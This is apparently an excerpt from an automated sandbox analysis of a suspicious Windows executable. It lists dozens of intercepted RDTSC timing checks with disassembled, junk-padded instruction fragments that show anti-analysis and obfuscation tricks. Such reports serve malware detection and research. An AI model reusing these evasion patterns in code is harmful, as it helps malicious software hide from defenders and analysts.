                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55AB6E second address: 55AB87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3F24EE2705h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55B3DB second address: 55B3E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55B3E1 second address: 55B3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F3F24EE26F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55B3EB second address: 55B3F5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3F244F40D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55B56B second address: 55B56F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55B56F second address: 55B573 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55B573 second address: 55B585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F3F24EE26F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55B585 second address: 55B5A0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3F244F40D6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F3F244F40DAh 0x00000012 push edi 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55B7E5 second address: 55B7F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F24EE26FFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55B7F8 second address: 55B815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3F244F40E2h 0x0000000b pop edi 0x0000000c push edx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55BB60 second address: 55BB73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F3F24EE26FEh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55BB73 second address: 55BB79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55BB79 second address: 55BB7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561C99 second address: 561CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F3F244F40D6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561CA6 second address: 561CC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F24EE2703h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561CC7 second address: 561CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561CCB second address: 561CDD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3F24EE26F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561CDD second address: 561CE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 560CD8 second address: 560CDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 560CDE second address: 560CF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F3F244F40D6h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 push eax 0x00000013 pop eax 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 560CF3 second address: 560CF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5682C4 second address: 5682DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3F244F40E2h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5682DD second address: 5682E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5678C8 second address: 5678D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F3F244F40D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568140 second address: 568146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568146 second address: 568157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop ebx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F3F244F40D6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568157 second address: 568172 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3F24EE26F6h 0x00000008 jmp 00007F3F24EE26FCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B916 second address: 56B946 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3F244F40D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jc 00007F3F244F40E8h 0x00000012 jmp 00007F3F244F40E2h 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push edi 0x0000001f pop edi 0x00000020 push eax 0x00000021 pop eax 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B946 second address: 56B969 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F24EE2707h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B969 second address: 56B96D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B96D second address: 56B980 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F24EE26FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B980 second address: 56B9BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jmp 00007F3F244F40DBh 0x00000011 pop eax 0x00000012 call 00007F3F244F40E2h 0x00000017 add dword ptr [ebp+122D1E47h], esi 0x0000001d pop esi 0x0000001e call 00007F3F244F40D9h 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B9BF second address: 56BA0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F24EE26FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F3F24EE26FAh 0x0000000e popad 0x0000000f push eax 0x00000010 push ecx 0x00000011 jns 00007F3F24EE26F8h 0x00000017 pushad 0x00000018 popad 0x00000019 pop ecx 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e jmp 00007F3F24EE2707h 0x00000023 mov eax, dword ptr [eax] 0x00000025 jc 00007F3F24EE2704h 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56BA0D second address: 56BA11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56BA11 second address: 56BA20 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56BB23 second address: 56BB37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F3F244F40D6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56BDA7 second address: 56BDAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C028 second address: 56C04B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnp 00007F3F244F40F4h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3F244F40E2h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C931 second address: 56C944 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3F24EE26FFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C944 second address: 56C948 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D8BF second address: 56D8C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56E27F second address: 56E289 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3F244F40D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D8C5 second address: 56D8FB instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3F24EE26F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f jmp 00007F3F24EE26FDh 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F3F24EE2707h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56EAE6 second address: 56EB01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F244F40E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56F5F7 second address: 56F5FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 570032 second address: 57003C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F3F244F40D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57003C second address: 5700D6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3F24EE26F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F3F24EE26F8h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 sub si, 4587h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007F3F24EE26F8h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 0000001Bh 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a or dword ptr [ebp+122D2456h], esi 0x00000050 push 00000000h 0x00000052 push 00000000h 0x00000054 push eax 0x00000055 call 00007F3F24EE26F8h 0x0000005a pop eax 0x0000005b mov dword ptr [esp+04h], eax 0x0000005f add dword ptr [esp+04h], 0000001Dh 0x00000067 inc eax 0x00000068 push eax 0x00000069 ret 0x0000006a pop eax 0x0000006b ret 0x0000006c mov edi, dword ptr [ebp+122D283Ch] 0x00000072 xchg eax, ebx 0x00000073 push eax 0x00000074 push edx 0x00000075 jmp 00007F3F24EE26FDh 0x0000007a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5700D6 second address: 5700FA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3F244F40E9h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 572199 second address: 57219E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5749DA second address: 5749F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3F244F40E8h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5749F7 second address: 5749FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5749FD second address: 574A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 574F83 second address: 575011 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F3F24EE2704h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F3F24EE26F8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 sub dword ptr [ebp+122D1C9Fh], edx 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edx 0x00000033 call 00007F3F24EE26F8h 0x00000038 pop edx 0x00000039 mov dword ptr [esp+04h], edx 0x0000003d add dword ptr [esp+04h], 00000015h 0x00000045 inc edx 0x00000046 push edx 0x00000047 ret 0x00000048 pop edx 0x00000049 ret 0x0000004a mov edi, dword ptr [ebp+122D2778h] 0x00000050 xchg eax, esi 0x00000051 jmp 00007F3F24EE2700h 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F3F24EE2704h 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D512 second address: 52D516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5729A5 second address: 5729CA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jo 00007F3F24EE2722h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3F24EE2704h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D516 second address: 52D51A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D51A second address: 52D525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B38F6 second address: 5B38FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B3C00 second address: 5B3C14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3F244F40E0h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B3C14 second address: 5B3C1A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B3C1A second address: 5B3C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6FBF second address: 5B6FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F3F24EE26F6h 0x0000000a pop ecx 0x0000000b jmp 00007F3F24EE2709h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6FE3 second address: 5B6FF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3F244F40DDh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6889 second address: 5B68C0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3F24EE26F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F3F24EE2709h 0x0000000f pop ebx 0x00000010 pushad 0x00000011 jmp 00007F3F24EE26FEh 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6A46 second address: 5B6A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6A4E second address: 5B6A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B9343 second address: 5B9381 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F244F40E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3F244F40DEh 0x00000011 jmp 00007F3F244F40E1h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B9381 second address: 5B939F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F24EE2705h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B939F second address: 5B93A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524E1C second address: 524E4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F24EE2704h 0x00000007 jnp 00007F3F24EE26F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 jmp 00007F3F24EE26FBh 0x00000015 pushad 0x00000016 popad 0x00000017 pop edi 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524E4C second address: 524E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD23D second address: 5BD276 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F3F24EE2706h 0x0000000e jmp 00007F3F24EE2703h 0x00000013 js 00007F3F24EE26F6h 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD690 second address: 5BD697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD697 second address: 5BD6A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3F24EE26FBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD6A6 second address: 5BD6CA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F3F244F40E7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD6CA second address: 5BD6D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD6D0 second address: 5BD6D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD96E second address: 5BD976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD976 second address: 5BD99C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F3F244F40DAh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3F244F40E5h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD99C second address: 5BD9A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C365F second address: 5C3666 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C1FD5 second address: 5C1FDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C25A1 second address: 5C25A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C25A9 second address: 5C25AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C26F0 second address: 5C26FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3F244F40DAh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C26FF second address: 5C270A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C270A second address: 5C270E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56AE8A second address: 56AEA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F3F24EE26F6h 0x00000009 jc 00007F3F24EE26F6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jnp 00007F3F24EE26F8h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C284D second address: 5C2867 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3F244F40E5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
